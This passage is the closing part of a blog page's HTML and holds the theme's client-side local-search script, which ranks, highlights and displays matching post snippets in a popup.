                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
